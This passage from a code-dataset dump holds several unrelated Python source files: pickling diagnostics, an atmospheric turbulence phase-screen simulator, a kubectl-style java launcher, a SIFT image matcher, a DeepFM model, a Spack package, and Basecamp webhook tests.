return [j for j in (badobjects(obj,0,exact,safe),) if j is not None]
obj = obj.values() if getattr(obj,'values',None) else obj
_obj = [] # can't use a set, as items may be unhashable
[_obj.append(badobjects(i,0,exact,safe)) for i in obj if i not in _obj]
return [j for j in _obj if j is not None]
def badobjects(obj, depth=0, exact=False, safe=False):
"""get objects that fail to pickle"""
from dill import pickles
if not depth:
if pickles(obj,exact,safe): return None
return obj
return dict(((attr, badobjects(getattr(obj,attr),depth-1,exact,safe)) \
for attr in dir(obj) if not pickles(getattr(obj,attr),exact,safe)))
def badtypes(obj, depth=0, exact=False, safe=False):
"""get types for objects that fail to pickle"""
from dill import pickles
if not depth:
if pickles(obj,exact,safe): return None
return type(obj)
return dict(((attr, badtypes(getattr(obj,attr),depth-1,exact,safe)) \
for attr in dir(obj) if not pickles(getattr(obj,attr),exact,safe)))
def errors(obj, depth=0, exact=False, safe=False):
"""get errors for objects that fail to pickle"""
from dill import pickles, copy
if not depth:
try:
pik = copy(obj)
if exact:
assert pik == obj, \
"Unpickling produces %s instead of %s" % (pik,obj)
assert type(pik) == type(obj), \
"Unpickling produces %s instead of %s" % (type(pik),type(obj))
return None
except Exception:
import sys
return sys.exc_info()[1]
_dict = {}
for attr in dir(obj):
try:
_attr = getattr(obj,attr)
except Exception:
import sys
_dict[attr] = sys.exc_info()[1]
continue
if not pickles(_attr,exact,safe):
_dict[attr] = errors(_attr,depth-1,exact,safe)
return _dict
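# A rough comment-only illustration of the probes above (Holder and its
# attributes are invented; the assumption is that obj.gen is something dill
# cannot handle -- generator objects are a common example):
#
#     class Holder(object):
#         def __init__(self):
#             self.data = [1, 2, 3]
#             self.gen = (i for i in range(3))
#
#     obj = Holder()
#     badobjects(obj, depth=1)   # -> {'gen': <generator object ...>, ...}
#     badtypes(obj, depth=1)     # -> {'gen': <type 'generator'>, ...}
#     errors(obj, depth=1)       # -> {'gen': TypeError(...), ...}
#
# With depth=0 each function reports on obj itself, or None if it pickles fine.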
# EOF
|
py | 1a305deddb86a2c4ba2982c43b54d1ee77b798ba | from __future__ import division
from .atmospheric_model import AtmosphericLayer, phase_covariance_von_karman, fried_parameter_from_Cn_squared
from ..statistics import SpectralNoiseFactoryMultiscale
from ..field import Field, RegularCoords, UnstructuredCoords, CartesianGrid
from .finite_atmospheric_layer import FiniteAtmosphericLayer
import numpy as np
from scipy import linalg
from scipy.ndimage import affine_transform
import time
import warnings
class InfiniteAtmosphericLayer(AtmosphericLayer):
def __init__(self, input_grid, Cn_squared=None, L0=np.inf, velocity=0, height=0, stencil_length=2, use_interpolation=False):
self._initialized = False
AtmosphericLayer.__init__(self, input_grid, Cn_squared, L0, velocity, height)
# Check properties of input_grid
if not input_grid.is_('cartesian'):
raise ValueError('Input grid must be cartesian.')
if not input_grid.is_regular:
raise ValueError('Input grid must be regularly spaced')
if not input_grid.ndim == 2:
raise ValueError('Input grid must be two-dimensional.')
self.stencil_length = stencil_length
self.use_interpolation = use_interpolation
self._make_stencils()
self._make_covariance_matrices()
self._make_AB_matrices()
self._make_initial_phase_screen()
self.center = np.zeros(2)
self._initialized = True
def _recalculate_matrices(self):
if self._initialized:
self._make_covariance_matrices()
self._make_AB_matrices()
def _make_stencils(self):
# Vertical
self.new_grid_bottom = CartesianGrid(RegularCoords(self.input_grid.delta, [self.input_grid.dims[0], 1], self.input_grid.zero - np.array([0, self.input_grid.delta[1]])))
self.stencil_bottom = Field(np.zeros(self.input_grid.size, dtype='bool'), self.input_grid).shaped
self.stencil_bottom[:self.stencil_length,:] = True
for i, n in enumerate(np.random.geometric(0.5, self.input_grid.dims[0])):
self.stencil_bottom[(n + self.stencil_length - 1) % self.input_grid.dims[1],i] = True
self.stencil_bottom = self.stencil_bottom.ravel()
self.num_stencils_vertical = np.sum(self.stencil_bottom)
# Horizontal
self.new_grid_left = CartesianGrid(RegularCoords(self.input_grid.delta, [1, self.input_grid.dims[1]], self.input_grid.zero - np.array([self.input_grid.delta[0], 0])))
self.stencil_left = Field(np.zeros(self.input_grid.size, dtype='bool'), self.input_grid).shaped
self.stencil_left[:,:self.stencil_length] = True
for i, n in enumerate(np.random.geometric(0.5, self.input_grid.dims[1])):
self.stencil_left[i,(n + self.stencil_length - 1) % self.input_grid.dims[0]] = True
self.stencil_left = self.stencil_left.ravel()
self.num_stencils_horizontal = np.sum(self.stencil_left)
def _make_covariance_matrices(self):
phase_covariance = phase_covariance_von_karman(fried_parameter_from_Cn_squared(1, 1), self.L0)
# Vertical
x = np.concatenate((self.input_grid.x[self.stencil_bottom], self.new_grid_bottom.x))
x = np.concatenate([x - xx for xx in x])
y = np.concatenate((self.input_grid.y[self.stencil_bottom], self.new_grid_bottom.y))
y = np.concatenate([y - yy for yy in y])
separations = CartesianGrid(UnstructuredCoords((x, y)))
n = self.new_grid_bottom.size + self.num_stencils_vertical
self.cov_matrix_vertical = phase_covariance(separations).reshape((n, n))
# Horizontal
x = np.concatenate((self.input_grid.x[self.stencil_left], self.new_grid_left.x))
x = np.concatenate([x - xx for xx in x])
y = np.concatenate((self.input_grid.y[self.stencil_left], self.new_grid_left.y))
y = np.concatenate([y - yy for yy in y])
separations = CartesianGrid(UnstructuredCoords((x, y)))
n = self.new_grid_left.size + self.num_stencils_horizontal
self.cov_matrix_horizontal = phase_covariance(separations).reshape((n, n))
def _make_AB_matrices(self):
# Vertical
n = self.num_stencils_vertical
cov_zz = self.cov_matrix_vertical[:n,:n]
cov_xz = self.cov_matrix_vertical[n:, :n]
cov_zx = self.cov_matrix_vertical[:n, n:]
cov_xx = self.cov_matrix_vertical[n:, n:]
cf = linalg.cho_factor(cov_zz)
inv_cov_zz = linalg.cho_solve(cf, np.eye(cov_zz.shape[0]))
self.A_vertical = cov_xz.dot(inv_cov_zz)
BBt = cov_xx - self.A_vertical.dot(cov_zx)
U, S, Vt = np.linalg.svd(BBt)
L = np.sqrt(S[:self.input_grid.dims[0]])
self.B_vertical = U * L
# Horizontal
n = self.num_stencils_horizontal
cov_zz = self.cov_matrix_horizontal[:n,:n]
cov_xz = self.cov_matrix_horizontal[n:, :n]
cov_zx = self.cov_matrix_horizontal[:n, n:]
cov_xx = self.cov_matrix_horizontal[n:, n:]
cf = linalg.cho_factor(cov_zz)
inv_cov_zz = linalg.cho_solve(cf, np.eye(cov_zz.shape[0]))
self.A_horizontal = cov_xz.dot(inv_cov_zz)
BBt = cov_xx - self.A_horizontal.dot(cov_zx)
U, S, Vt = np.linalg.svd(BBt)
L = np.sqrt(S[:self.input_grid.dims[1]])
self.B_horizontal = U * L
def _make_initial_phase_screen(self):
oversampling = 16
layer = FiniteAtmosphericLayer(self.input_grid, self.Cn_squared, self.outer_scale, self.velocity, self.height, oversampling)
self._achromatic_screen = layer.phase_for(1)
self._shifted_achromatic_screen = self._achromatic_screen
def _extrude(self, where=None):
flipped = (where == 'top') or (where == 'right')
horizontal = (where == 'left') or (where == 'right')
if where == 'top' or where == 'right':
screen = self._achromatic_screen[::-1]
else:
screen = self._achromatic_screen
if horizontal:
stencil = self.stencil_left
A = self.A_horizontal
B = self.B_horizontal
else:
stencil = self.stencil_bottom
A = self.A_vertical
B = self.B_vertical
stencil_data = screen[stencil]
random_data = np.random.normal(0, 1, size=B.shape[1])
new_slice = A.dot(stencil_data) + B.dot(random_data) * np.sqrt(self._Cn_squared)
screen = screen.shaped
if horizontal:
screen = np.hstack((new_slice[:,np.newaxis], screen[:,:-1]))
else:
screen = np.vstack((new_slice[np.newaxis,:], screen[:-1,:]))
screen = Field(screen, self.input_grid)
if flipped:
self._achromatic_screen = screen[::-1,::-1].ravel()
else:
self._achromatic_screen = screen.ravel()
def phase_for(self, wavelength):
return self._shifted_achromatic_screen / wavelength
def reset(self):
self._make_initial_phase_screen()
self.center = np.zeros(2)
self._t = 0
def evolve_until(self, t):
if t is None:
self.reset()
return
old_center = np.round(self.center / self.input_grid.delta).astype('int')
self.center = self.velocity * t
new_center = np.round(self.center / self.input_grid.delta).astype('int')
delta = new_center - old_center
for i in range(abs(delta[0])):
if delta[0] < 0:
self._extrude('left')
else:
self._extrude('right')
for i in range(abs(delta[1])):
if delta[1] < 0:
self._extrude('bottom')
else:
self._extrude('top')
if self.use_interpolation:
# Use bilinear interpolation to interpolate the achromatic phase screen to the correct position.
# This is to avoid sudden shifts by discrete pixels.
ps = self._achromatic_screen.shaped
sub_delta = self.center - new_center * self.input_grid.delta
with warnings.catch_warnings():
warnings.filterwarnings('ignore', message='The behaviour of affine_transform with a one-dimensional array supplied for the matrix parameter has changed in scipy 0.18.0.')
self._shifted_achromatic_screen = affine_transform(ps, np.array([1,1]), (sub_delta / self.input_grid.delta)[::-1], mode='nearest', order=1).ravel()
else:
self._shifted_achromatic_screen = self._achromatic_screen
@property
def Cn_squared(self):
return self._Cn_squared
@Cn_squared.setter
def Cn_squared(self, Cn_squared):
self._Cn_squared = Cn_squared
@property
def outer_scale(self):
return self._L0
@outer_scale.setter
def L0(self, L0):
self._L0 = L0
self._recalculate_matrices() |
py | 1a305f2fba69629b890dad5bc0f21b54b8cebba3 | #!/bin/env python
import os
import sys
import random
import subprocess as sub
import getopt
import time
def identity(x):
return x
def cygpath(x):
command = ["cygpath", "-wp", x]
p = sub.Popen(command,stdout=sub.PIPE)
output, errors = p.communicate()
lines = output.split("\n")
return lines[0]
if sys.platform == "cygwin":
normclasspath = cygpath
else:
normclasspath = identity
CUSTOM_CONF_FILE = ""
CONFIG_OPTS = []
STATUS = 0
JKUBERNETES_DIR = "/".join(os.path.realpath( __file__ ).split("/")[:-2])
JKUBERNETES_CONF_DIR = os.getenv("JKUBERNETES_CONF_DIR", JKUBERNETES_DIR + "/conf" )
CONFIG_OPTS = []
EXCLUDE_JARS = []
INCLUDE_JARS = []
API_SERVER_ADDRESS = ""
JKUBERNETES_CREATE_YAML_PATH = ""
def check_java():
check_java_cmd = 'which java'
ret = os.system(check_java_cmd)
if ret != 0:
print("Failed to find java, please add java to PATH")
sys.exit(-1)
def print_commands():
"""Print all client commands and link to documentation"""
print ("kubectl command [-s http://apiserverip:port]")
print ("Commands:\n\t", "\n\t".join(sorted(COMMANDS.keys())))
print ("\nHelp:", "\n\thelp", "\n\thelp <command>")
print ("\nDocumentation for the jkubernetes client can be found at https://github.com/gwisoft/jkubernetes/wiki/jkubernetes-Chinese-Documentation\n")
def get_jars_full(adir):
ret = []
temp = adir.strip()
print (temp == "")
if temp == "":
return ret
files = os.listdir(adir)
for f in files:
if f.endswith(".jar") == False:
continue
filter = False
for exclude_jar in EXCLUDE_JARS:
if f.find(exclude_jar) >= 0:
filter = True
break
if filter == True:
print ("Don't add " + f + " to classpath")
else:
ret.append(adir + "/" + f)
return ret
def unknown_command(*args):
print ("Unknown command: [kubectl %s]" % ' '.join(sys.argv[1:]))
print_usage()
def print_usage(command=None):
"""Print one help message or list of available commands"""
if command != None:
if command in COMMANDS:
print (COMMANDS[command].__doc__ or
"No documentation provided for <%s>" % command)
else:
print ("<%s> is not a valid command" % command)
else:
print_commands()
def parse_config_opts_and_args(args):
curr = args[:]
curr.reverse()
config_list = []
args_list = []
while len(curr) > 0:
token = curr.pop()
if token == "-s":
global API_SERVER_ADDRESS
API_SERVER_ADDRESS = curr.pop()
elif token == "-c":
config_list.append(curr.pop())
elif token == "--config":
global CUSTOM_CONF_FILE
CUSTOM_CONF_FILE = curr.pop()
else:
args_list.append(token)
print ("config_list=")
print (config_list)
print ("args_list=")
print (args_list)
return config_list, args_list
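# A worked illustration of the parser above (comment sketch; the argument
# values are hypothetical):
#
#     parse_config_opts_and_args(['create', '-f', 'demo.yaml', '-s', 'http://10.0.0.1:8080'])
#
# consumes '-s http://10.0.0.1:8080' into the global API_SERVER_ADDRESS and
# returns ([], ['create', '-f', 'demo.yaml']); values following '-c' would be
# collected into the returned config_list, and '--config' sets CUSTOM_CONF_FILE.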
def parse_config_opts(config_list):
global CONFIG_OPTS
if len(config_list) > 0:
for config in config_list:
CONFIG_OPTS.append(config)
def filter_array(array):
ret = []
for item in array:
temp = item.strip()
if temp != "":
ret.append(temp)
return ret
def get_config_opts():
global CONFIG_OPTS
print ("-Dkubernetes.options=" + (','.join(CONFIG_OPTS)).replace(' ', "%%%%"))
return "-Dkubernetes.options=" + (','.join(CONFIG_OPTS)).replace(' ', "%%%%")
# Input parameter for the extra (excluded) jar packages, passed to the JVM as -Dexclude.jars
def get_exclude_jars():
global EXCLUDE_JARS
return " -Dexclude.jars=" + (','.join(EXCLUDE_JARS))
def create(args):
"""
kubectl create -f ***.yaml
"""
pass
args = parse_client_createopts(args)
childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.kubectl.KubectlCreate",
jvmtype="-client -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="false")
def kube(args):
"""
kubectl kube
"""
pass
childopts = get_client_customopts() + get_exclude_jars()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.daemon.kube.KubeServer",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="true")
def kubelet(args):
"""
kubectl kubelet
"""
pass
childopts = get_client_customopts() + get_exclude_jars()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.daemon.kubelet.Kubelet",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="true")
def delete(args):
"""
kubectl delete -f ***.yaml
"""
pass
args = parse_client_createopts(args)
childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.kubectl.KubectlDelete",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="false")
def rollingUpdate(args):
"""
kubectl rolling-update [old topology name] -f ***.yaml
"""
pass
args = parse_client_createopts(args)
childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.kubectl.KubectlRollingUpdate",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="false")
def replace(args):
"""
kubectl replace -f ***.yaml
"""
pass
args = parse_client_createopts(args)
childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.kubectl.KubectlReplace",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="false")
def get(args):
"""
kubectl get po [topology name]
"""
pass
childopts = get_client_customopts() + get_exclude_jars()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.kubectl.KubectlGet",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="false")
def get_client_createopts():
ret = (" -Dkubernetes.create.yaml=" + JKUBERNETES_CREATE_YAML_PATH + " -Dkubernetes.apiserver.address=" + API_SERVER_ADDRESS)
return ret
def parse_client_createopts(args):
print ("parse_client_createopts=")
print (args)
curr = args
curr.reverse()
args_list = []
while len(curr) > 0:
token = curr.pop()
print (token == "-f")
if token == "-f":
global JKUBERNETES_CREATE_YAML_PATH
JKUBERNETES_CREATE_YAML_PATH = curr.pop()
else:
args_list.append(token)
print (args_list)
return args_list
def exec_jkubernetes_class(klass, jvmtype="-server", sysdirs=[], args=[], childopts="",isBackgroundRun=""):
args_str = " ".join(args)
command = "java " + " -Dkubernetes.home=" + JKUBERNETES_DIR + " " + get_config_opts() + " " + childopts + " -cp " + get_classpath(sysdirs) + " " + klass + " " + args_str
print ("Running: " + command)
global STATUS
STATUS = os.execvp("java", filter_array(command.split(" ")))
# System-defined custom configuration parameters passed to the JVM
def get_client_customopts():
ret = ("")
"""
ret = (" -Dkubernetes.root.logger=INFO,stdout -Dlogback.configurationFile=" + JKUBERNETES_DIR +
"/conf/client_logback.xml -Dlog4j.configuration=File:" + JKUBERNETES_DIR +
"/conf/client_log4j.properties")
"""
return ret
def get_classpath(extrajars):
ret = []
ret.extend(extrajars)
ret.extend(get_jars_full(JKUBERNETES_DIR))
ret.extend(get_jars_full(JKUBERNETES_DIR + "/lib"))
ret.extend(INCLUDE_JARS)
return normclasspath(":".join(ret))
def main():
if len(sys.argv) <= 1:
print_usage()
sys.exit(-1)
global CONFIG_OPTS
config_list, args = parse_config_opts_and_args(sys.argv[1:])
parse_config_opts(config_list)
COMMAND = args[0]
ARGS = args[1:]
if COMMANDS.get(COMMAND) == None:
unknown_command(COMMAND)
sys.exit(-1)
if len(ARGS) != 0 and ARGS[0] == "help":
print_usage(COMMAND)
sys.exit(0)
try:
(COMMANDS.get(COMMAND,"help"))(ARGS)
except Exception as msg:
print(msg)
print_usage(COMMAND)
sys.exit(-1)
sys.exit(STATUS)
COMMANDS = {"create": create,"kube":kube,"kubelet":kubelet,"delete":delete,"rolling-update":rollingUpdate,"replace":replace,"get":get}
if __name__ == "__main__":
#check_java()
main()
|
py | 1a305f413095051a324e8a035128541b13d6768f | import cv2
import numpy as np
from matplotlib import pyplot as plt
from .log import logger
MATCHER_DEBUG = False
FLANN_INDEX_KDTREE = 0
GOOD_DISTANCE_LIMIT = 0.7
SIFT = cv2.SIFT_create()
def is_in_poly(p, poly):
"""
:param p: [x, y]
:param poly: [[], [], [], [], ...]
    :return: True if the point lies inside the polygon (points on a vertex or edge count as inside)
"""
px, py = p
is_in = False
for i, corner in enumerate(poly):
next_i = i + 1 if i + 1 < len(poly) else 0
x1, y1 = corner
x2, y2 = poly[next_i]
if (x1 == px and y1 == py) or (x2 == px and y2 == py): # if point is on vertex
is_in = True
break
if min(y1, y2) < py <= max(y1, y2): # find horizontal edges of polygon
x = x1 + (py - y1) * (x2 - x1) / (y2 - y1)
if x == px: # if point is on edge
is_in = True
break
elif x > px: # if point is on left-side of line
is_in = not is_in
return is_in
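# A small comment-only sketch of the ray-casting test above (values chosen for
# illustration only):
#
#     unit_square = [[0, 0], [1, 0], [1, 1], [0, 1]]
#     is_in_poly([0.5, 0.5], unit_square)   # -> True   (interior point)
#     is_in_poly([2.0, 0.5], unit_square)   # -> False  (outside)
#     is_in_poly([1, 1], unit_square)       # -> True   (vertices count as inside)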
class FlannBasedMatcher():
def __init__(self, origin):
self.origin = origin
self.kp, self.des = SIFT.detectAndCompute(origin, None)
logger.debug(f'FlannBasedMatcher init: shape ({origin.shape})')
def match(self, query, ret_square=True, draw=False, scope=None):
if self.des is None:
logger.debug('feature points is None')
if ret_square:
return None
return False
if scope is not None:
logger.debug(f'before: {len(self.kp)}')
logger.debug(f'scope: {scope}')
kp0, des0 = [], []
for kp, des in zip(self.kp, self.des):
if scope[0][0] <= kp.pt[0] and scope[0][1] <= kp.pt[1] and kp.pt[0] <= scope[1][0] and kp.pt[1] <= scope[1][1]:
kp0.append(kp)
des0.append(des)
logger.debug(f'after: {len(kp0)}')
kp0, des0 = np.array(kp0), np.array(des0)
else:
kp0, des0 = self.kp, self.des
h, w = query.shape
kp, des = SIFT.detectAndCompute(query, None)
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)
search_params = dict(checks=50)
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(des, des0, k=2)
"""store all the good matches as per Lowe's ratio test."""
good = []
for x, y in matches:
if x.distance < GOOD_DISTANCE_LIMIT * y.distance:
good.append(x)
"""draw the result"""
if draw:
result = cv2.drawMatches(
query, kp, self.origin, kp0, good, None)
plt.imshow(result, 'gray')
plt.show()
if len(good) <= 4 or len(good) / len(des) < 0.2:
logger.debug(
f'not enough good matches are found: {len(good)} / {len(matches)} / {len(des)} / {len(good) / len(des)}')
if ret_square:
return None
return False
"""get the coordinates of good matches"""
src_pts = np.float32(
[kp[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
dst_pts = np.float32(
[kp0[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)
"""calculated transformation matrix and the mask"""
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
matchesMask = mask.ravel().tolist()
if M is None:
logger.debug('calculated transformation matrix failed')
if ret_square:
return None
return False
pts = np.float32([[0, 0], [0, h-1], [w-1, h-1],
[w-1, 0]]).reshape(-1, 1, 2)
dst = cv2.perspectiveTransform(pts, M)
dst_list = np.int32(dst).reshape(4, 2).tolist()
better = filter(lambda m: is_in_poly(
kp0[m.trainIdx].pt, dst_list), good)
better_kp_x = [kp[m.queryIdx].pt[0] for m in better]
if len(better_kp_x):
good_area_rate = np.ptp(better_kp_x) / w
else:
good_area_rate = 0
"""draw the result"""
if draw or MATCHER_DEBUG:
origin = np.array(self.origin)
cv2.polylines(origin, [np.int32(dst)], True, 0, 2, cv2.LINE_AA)
draw_params = dict(matchColor=(
0, 255, 0), singlePointColor=None, matchesMask=matchesMask, flags=2)
result = cv2.drawMatches(
query, kp, origin, kp0, good, None, **draw_params)
plt.imshow(result, 'gray')
plt.show()
if abs(dst[0][0][0] - dst[1][0][0]) > 30 or abs(dst[2][0][0] - dst[3][0][0]) > 30 or abs(dst[0][0][1] - dst[3][0][1]) > 30 or abs(dst[1][0][1] - dst[2][0][1]) > 30:
logger.debug(f'square is not rectangle: {dst_list}')
if ret_square:
return None
return False
if good_area_rate < 0.5:
logger.debug(f'good_area_rate is not enough: {good_area_rate}')
if ret_square:
return None
return False
logger.info(
f'matches: {len(good)} / {len(matches)} / {len(des)} / {len(good) / len(des)} / {good_area_rate}')
logger.debug(f'find in {dst_list}')
if ret_square:
return dst_list
return True
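# A minimal usage sketch (the file names are placeholders; both images are
# assumed to be single-channel/grayscale arrays, matching how `query.shape`
# is unpacked into (h, w) above):
#
#     template = cv2.imread('screen.png', cv2.IMREAD_GRAYSCALE)
#     icon = cv2.imread('icon.png', cv2.IMREAD_GRAYSCALE)
#     matcher = FlannBasedMatcher(template)
#     square = matcher.match(icon)                   # corner coordinates in template, or None
#     found = matcher.match(icon, ret_square=False)  # plain True / False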
|
py | 1a305f93b025dff8077f2da2ea70fa4f020a9213 | # -*- coding:utf-8 -*-
"""
Author:
Weichen Shen,[email protected]
Reference:
[1] Guo H, Tang R, Ye Y, et al. Deepfm: a factorization-machine based neural network for ctr prediction[J]. arXiv preprint arXiv:1703.04247, 2017.(https://arxiv.org/abs/1703.04247)
"""
import tensorflow as tf
from ..input_embedding import preprocess_input_embedding, get_linear_logit
from ..layers.core import PredictionLayer, DNN
from ..layers.interaction import FM
from ..layers.utils import concat_fun
from ..utils import check_feature_config_dict
def DeepFM(feature_dim_dict, embedding_size=8,
use_fm=True, dnn_hidden_units=(128, 128), l2_reg_linear=0.00001, l2_reg_embedding=0.00001, l2_reg_dnn=0,
init_std=0.0001, seed=1024, dnn_dropout=0, dnn_activation='relu', dnn_use_bn=False, task='binary'):
"""Instantiates the DeepFM Network architecture.
:param feature_dim_dict: dict,to indicate sparse field and dense field like {'sparse':{'field_1':4,'field_2':3,'field_3':2},'dense':['field_4','field_5']}
:param embedding_size: positive integer,sparse feature embedding_size
:param use_fm: bool,use FM part or not
:param dnn_hidden_units: list,list of positive integer or empty list, the layer number and units in each layer of DNN
:param l2_reg_linear: float. L2 regularizer strength applied to linear part
:param l2_reg_embedding: float. L2 regularizer strength applied to embedding vector
:param l2_reg_dnn: float. L2 regularizer strength applied to DNN
:param init_std: float,to use as the initialize std of embedding vector
:param seed: integer ,to use as random seed.
:param dnn_dropout: float in [0,1), the probability we will drop out a given DNN coordinate.
:param dnn_activation: Activation function to use in DNN
:param dnn_use_bn: bool. Whether use BatchNormalization before activation or not in DNN
:param task: str, ``"binary"`` for binary logloss or ``"regression"`` for regression loss
:return: A Keras model instance.
"""
check_feature_config_dict(feature_dim_dict)
deep_emb_list, linear_emb_list, dense_input_dict, inputs_list = preprocess_input_embedding(feature_dim_dict,
embedding_size,
l2_reg_embedding,
l2_reg_linear, init_std,
seed,
create_linear_weight=True)
linear_logit = get_linear_logit(linear_emb_list, dense_input_dict, l2_reg_linear)
fm_input = concat_fun(deep_emb_list, axis=1)
deep_input = tf.keras.layers.Flatten()(fm_input)
fm_out = FM()(fm_input)
deep_out = DNN(dnn_hidden_units, dnn_activation, l2_reg_dnn, dnn_dropout,
dnn_use_bn, seed)(deep_input)
deep_logit = tf.keras.layers.Dense(
1, use_bias=False, activation=None)(deep_out)
if len(dnn_hidden_units) == 0 and use_fm == False: # only linear
final_logit = linear_logit
elif len(dnn_hidden_units) == 0 and use_fm == True: # linear + FM
final_logit = tf.keras.layers.add([linear_logit, fm_out])
elif len(dnn_hidden_units) > 0 and use_fm == False: # linear + Deep
final_logit = tf.keras.layers.add([linear_logit, deep_logit])
elif len(dnn_hidden_units) > 0 and use_fm == True: # linear + FM + Deep
final_logit = tf.keras.layers.add([linear_logit, fm_out, deep_logit])
else:
raise NotImplementedError
output = PredictionLayer(task)(final_logit)
model = tf.keras.models.Model(inputs=inputs_list, outputs=output)
return model
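# A rough usage sketch (feature names and vocabulary sizes are invented; the
# dict layout follows the feature_dim_dict format described in the docstring,
# and the compile/fit calls are ordinary tf.keras usage, not part of this module):
#
#     feature_dim_dict = {'sparse': {'user_id': 1000, 'item_id': 5000, 'gender': 2},
#                         'dense': ['price']}
#     model = DeepFM(feature_dim_dict, embedding_size=8, dnn_hidden_units=(128, 128))
#     model.compile('adam', 'binary_crossentropy', metrics=['binary_crossentropy'])
#     # model.fit(model_input, labels, ...) with model_input ordered like inputs_list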
|
py | 1a305ffdb17c2cb3c68761e651cdef0d1f01d549 | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyWidgetsnbextension(PythonPackage):
"""IPython HTML widgets for Jupyter"""
homepage = "https://pypi.python.org/pypi/widgetsnbextension"
url = "https://pypi.io/packages/source/w/widgetsnbextension/widgetsnbextension-1.2.6.tar.gz"
version('1.2.6', '0aa4e152c9ba2d704389dc2453f448c7')
depends_on('py-setuptools', type='build')
    depends_on('python@2.7:2.8,3.3:')
    depends_on('py-notebook@4.4.1:', type=('build', 'run'))
|
py | 1a306050302d9dc0044c00e81353241d282bb2b0 | from zerver.lib.test_classes import WebhookTestCase
TOPIC = "Zulip HQ"
class BasecampHookTests(WebhookTestCase):
STREAM_NAME = "basecamp"
URL_TEMPLATE = "/api/v1/external/basecamp?stream={stream}&api_key={api_key}"
FIXTURE_DIR_NAME = "basecamp"
def test_basecamp_makes_doc_active(self) -> None:
expected_message = "Tomasz activated the document [New doc](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214)."
self._send_and_test_message("doc_active", expected_message)
def test_basecamp_makes_doc_archived(self) -> None:
expected_message = "Tomasz archived the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)."
self._send_and_test_message("doc_archived", expected_message)
def test_basecamp_makes_doc_changed_content(self) -> None:
expected_message = "Tomasz changed content of the document [New doc edit](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214)."
self._send_and_test_message("doc_content_changed", expected_message)
def test_basecamp_makes_doc_changed_title(self) -> None:
expected_message = "Tomasz changed title of the document [New doc edit](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214)."
self._send_and_test_message("doc_title_changed", expected_message)
def test_basecamp_makes_doc_publicized(self) -> None:
expected_message = "Tomasz publicized the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)."
self._send_and_test_message("doc_publicized", expected_message)
def test_basecamp_makes_doc_created(self) -> None:
expected_message = "Tomasz created the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)."
self._send_and_test_message("doc_created", expected_message)
def test_basecamp_makes_doc_trashed(self) -> None:
expected_message = "Tomasz trashed the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)."
self._send_and_test_message("doc_trashed", expected_message)
def test_basecamp_makes_doc_unarchived(self) -> None:
expected_message = "Tomasz unarchived the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)."
self._send_and_test_message("doc_unarchive", expected_message)
def test_basecamp_makes_questions_answer_archived(self) -> None:
expected_message = "Tomasz archived the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question?](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)"
self._send_and_test_message("questions_answer_archived", expected_message)
def test_basecamp_makes_questions_answer_content_changed(self) -> None:
expected_message = "Tomasz changed content of the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("questions_answer_content_changed", expected_message)
def test_basecamp_makes_questions_answer_created(self) -> None:
